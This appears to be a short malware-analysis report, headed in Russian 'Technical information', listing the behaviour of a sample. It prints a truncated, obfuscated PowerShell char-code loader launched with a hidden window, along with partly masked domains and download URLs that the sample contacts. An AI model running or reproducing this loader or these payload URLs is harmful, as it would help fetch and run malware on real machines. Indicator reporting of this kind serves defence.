Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -joIn (( 97 ,35 ,28,17, 38 , 43 , 101 ,120,101,43 ,32 , 50 , 104,42 , 39 , 47, 32,38 , 49,101,55, 36, 43 ,33,42, 40 , 126,97 , 29 ,41,29 ,4 , 23 ,46 ,101, 120 ,101, 43 , 32,50 , 104, 42 ,39 , 4...
- 'cn##in.com':80
- 'cn##in.com':443
- 'dr####tyle.com.ua':80
- 'dr####tyle.com.ua':443
- 'bj##ys.com':80
- 'la###arket.com':80
- 'se####yenferenc.hu':80
- http://www.cn##in.com/8MDl8d9/
- http://www.dr####tyle.com.ua/a930x9/
- http://bj##ys.com/LGfWC/
- http://la###arket.com/WXa1W/
- http://www.la###arket.com/WXa1W/
- http://se####yenferenc.hu/od7i8e5/
- 'cn##in.com':443
- 'dr####tyle.com.ua':443
- DNS ASK cn##in.com
- DNS ASK dr####tyle.com.ua
- DNS ASK bj##ys.com
- DNS ASK la###arket.com
- DNS ASK se####yenferenc.hu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -joIn (( 97 ,35 ,28,17, 38 , 43 , 101 ,120,101,43 ,32 , 50 , 104,42 , 39 , 47, 32,38 , 49,101,55, 36, 43 ,33,42, 40 , 126,97 , 29 ,41,29 ,4 , 23 ,46 ,101, 120 ,101, 43 , 32,50 , 104, 42 ,39 , 4...' (со скрытым окном)